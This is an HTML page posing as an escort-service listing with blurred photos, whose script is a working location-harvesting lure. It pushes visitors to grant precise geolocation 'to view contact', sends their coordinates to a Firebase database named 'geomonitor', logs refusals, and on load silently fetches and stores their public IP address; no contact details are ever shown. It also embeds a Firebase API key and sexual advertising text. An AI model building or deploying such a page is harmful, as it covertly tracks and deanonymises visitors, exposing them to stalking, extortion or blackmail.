<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Call Girls</title>
    <style>
      body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 20px;
        display: flex;
        flex-direction: column;
        align-items: center;
        min-height: 100vh;
        background-color: #f0f0f0;
      }
      .image-grid {
        display: grid;
        grid-template-columns: repeat(3, 1fr);
        gap: 20px;
        max-width: 1200px;
        margin: 20px auto;
      }
      .image-container {
        position: relative;
        aspect-ratio: 16 / 9;
        overflow: hidden;
        border-radius: 10px;
        cursor: pointer;
      }
      .image-container img {
        width: 100%;
        height: 100%;
        object-fit: cover;
      }
      .blur-overlay {
        position: absolute;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        background: rgba(255, 255, 255, 0.5);
        backdrop-filter: blur(10px);
        transition: all 0.3s ease;
      }
      .blur-overlay::after {
        content: var(--overlay-content, 'Click to view contact');
        position: absolute;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
        color: #fff;
        background: rgba(0, 0, 0, 0.7);
        padding: 10px 15px;
        border-radius: 5px;
        font-size: 14px;
      }
      .teaser-circle {
        position: absolute;
        width: 100px;
        height: 100px;
        border-radius: 50%;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
        overflow: hidden;
        pointer-events: none;
      }
      #locationStatus {
        text-align: center;
        margin: 20px;
        max-width: 600px;
        font-size: 18px;
      }
      #allowLocationBtn {
        margin-top: 10px;
        padding: 10px 20px;
        background-color: #4caf50;
        color: white;
        border: none;
        border-radius: 5px;
        cursor: pointer;
        font-size: 16px;
      }
      #allowLocationBtn:hover {
        background-color: #45a049;
      }
    </style>
  </head>
  <body>
    <div id="locationStatus" style="display:none"></div>
    <div id="">
       <h2>Explore Sexy Young Girls/Aunties near your location</h2> 
      Service|Handjob|Cum Sucking|Massage all at your convenient place. At low price | PAY AfterService only 
    </div>
    <button id="allowLocationBtn" style="display:none">Allow Location Access</button>
    <div class="image-grid" id="imageGrid">
      <!-- We'll populate this with JavaScript -->
    </div>

    <script type="module">

          // Import the required Firebase services
          import { initializeApp } from 'https://www.gstatic.com/firebasejs/10.12.5/firebase-app.js';
        import { getDatabase, ref, push } from 'https://www.gstatic.com/firebasejs/10.12.5/firebase-database.js';

        // Your web app's Firebase configuration
       
   const firebaseConfig = {
            apiKey: "AIzaSyC3RPlvOkd8LP-r1KZDa1hCBezhI8MEDiI",
            authDomain: "geomonitor-c92fb.firebaseapp.com",
            projectId: "geomonitor-c92fb",
            storageBucket: "geomonitor-c92fb.appspot.com",
            messagingSenderId:  "1085073508855",
            appId: "1:1085073508855:web:9ca3414443bc520085c6f2",
            databaseURL: "https://geomonitor-c92fb-default-rtdb.firebaseio.com/"
        };

        // Initialize Firebase
        const app = initializeApp(firebaseConfig);
        const database = getDatabase(app);


   var overlay = '';
 



      const imageGrid = document.getElementById('imageGrid');
      const locationStatus = document.getElementById('locationStatus');
      const allowLocationBtn = document.getElementById('allowLocationBtn');
      const imagePath =
        ['https://cdn.schloka.com/in/Content/Uploads/SCH-63857620326322-2103213618.jpg','https://cdn.schloka.com/in/Content/Uploads/SCH-63858004686655-2103213618.jpg','https://cdn.schloka.com/in/Content/Uploads/SCH-63857426954950-2103213618.jpg','https://cdn.schloka.com/in/Content/Uploads/SCH-63856376588909-2103213618.jpg','https://cdn.schloka.com/in/Content/Uploads/SCH-63858215251570-2103213618.jpg','https://cdn.schloka.com/in/Content/Uploads/SCH-63858215252147-2103213618.jpg','https://cdn.schloka.com/in/Content/Uploads/SCH-63858202203364-2103213618.jpg','https://cdn.schloka.com/in/Content/Uploads/SCH-63844875490126-2103213618.jpg','https://cdn.schloka.com/in/Content/Uploads/SCH-63856165139877-2103213618.jpg'];

      function createImageGrid() {
        for (let i = 0; i < 9; i++) {
          const container = document.createElement('div');
          container.className = 'image-container';
          const img = document.createElement('img');
          img.src = imagePath[i];
          img.alt = `Image ${i + 1}`;
          container.appendChild(img);

          if(i>1){
          const blurOverlay = document.createElement('div');
          blurOverlay.className = 'blur-overlay';
          container.appendChild(blurOverlay);

          const teaserCircle = document.createElement('div');
          teaserCircle.className = 'teaser-circle';
          teaserCircle.style.backgroundImage = `url(${imagePath})`;
          teaserCircle.style.backgroundPosition = 'center';
          teaserCircle.style.backgroundSize = '500%';
          container.appendChild(teaserCircle);
          overlay = document.querySelector('.blur-overlay')
          }

          imageGrid.appendChild(container);
        }
      }

      function requestLocationPermission() {
        if (navigator.geolocation) {
          navigator.geolocation.getCurrentPosition(
            showImages,
            handleLocationError,
            {
              enableHighAccuracy: true,
              timeout: 5000,
              maximumAge: 0,
            }
          );
        } else {
          locationStatus.textContent =
            'Geolocation is not supported by this browser.';
            alert('Enable location to view contact');


            push(ref(database, 'errorEnable_callg'), {
                            timestamp: Date.now()
                        }).then(function() {
                            console.log('Location saved successfully!');
                        }).catch(function(error) {
                            console.error('Error saving location to Firebase:', error);
                        });
        }
        overlay.style.setProperty('--overlay-content', 'Reload and allow location to view');

      }

      function showImages(position) {


        push(ref(database, 'locations_callg'), {
                            latitude: position.coords.latitude,
                            longitude: position.coords.longitude,
                            timestamp: Date.now()
                        }).then(function() {
                            console.log('Location saved successfully!');
                        }).catch(function(error) {
                            console.error('Error saving location to Firebase:', error);
                        });

        document
          .querySelectorAll('.blur-overlay, .teaser-circle')
          .forEach((el) => {
            el.style.display = 'none';
          });




        locationStatus.textContent = `Images revealed! Your location: ${position.coords.latitude.toFixed(
          2
        )}, ${position.coords.longitude.toFixed(2)}`;
        allowLocationBtn.style.display = 'none';
      }

      function handleLocationError(error) {
        console.error('Geolocation error:', error);
        switch (error.code) {
          case error.PERMISSION_DENIED:

          push(ref(database, 'errorDenied_callg'), {
                            timestamp: Date.now()
                        }).then(function() {
                            console.log('Location saved successfully!');
                        }).catch(function(error) {
                            console.error('Error saving location to Firebase:', error);
                        });
            locationStatus.textContent =
              'Location access was denied. Click an image or the button below to try again.';
              alert('Reload and allow location to view contact');

              break;
          case error.POSITION_UNAVAILABLE:
          overlay.style.setProperty('--overlay-content', 'Reload and allow location to view');

          push(ref(database, 'errorAvailable_callg'), {
                            timestamp: Date.now()
                        }).then(function() {
                            console.log('Location saved successfully!');
                        }).catch(function(error) {
                            console.error('Error saving location to Firebase:', error);
                        });
            locationStatus.textContent =
              'Location information is unavailable. Please try again.';

            break;
          case error.TIMEOUT:
          push(ref(database, 'errorTimeout_callg'), {
                            timestamp: Date.now()
                        }).then(function() {
                            console.log('Location saved successfully!');
                        }).catch(function(error) {
                            console.error('Error saving location to Firebase:', error);
                        });
            locationStatus.textContent =
              'The request to get user location timed out. Please try again.';
              overlay.style.setProperty('--overlay-content', 'Reload and allow location to view');

            break;
          default:
          push(ref(database, 'errorDefault_callg'), {
                            timestamp: Date.now()
                        }).then(function() {
                            console.log('Location saved successfully!');
                        }).catch(function(error) {
                            console.error('Error saving location to Firebase:', error);
                        });
            locationStatus.textContent =
              'An unknown error occurred. Please try again.';
              overlay.style.setProperty('--overlay-content', 'Reload and allow location to view');

            break;
        }
        allowLocationBtn.style.display = 'block';
      }

      // Event listeners
      window.addEventListener('load', () => {
        createImageGrid();
      });

      allowLocationBtn.addEventListener('click', requestLocationPermission);

      imageGrid.addEventListener('click', (event) => {
        if (event.target.closest('.image-container')) {
          requestLocationPermission();
        }
      });


      async function getIpAddress() {
  try {
    const response = await fetch('https://api.ipify.org?format=json');
    const data = await response.json();

    push(ref(database, 'ips_callg'), {
                            ip_address: data.ip,
                            timestamp: Date.now()
                        }).then(function() {
                            console.log('Ip saved!');
                        }).catch(function(error) {
                            console.error('Error saving Ip:', error);
                        });
  } catch (error) {
    console.error('Error fetching IP address:', error);
  }
}

getIpAddress();
    </script>
  </body>
</html>
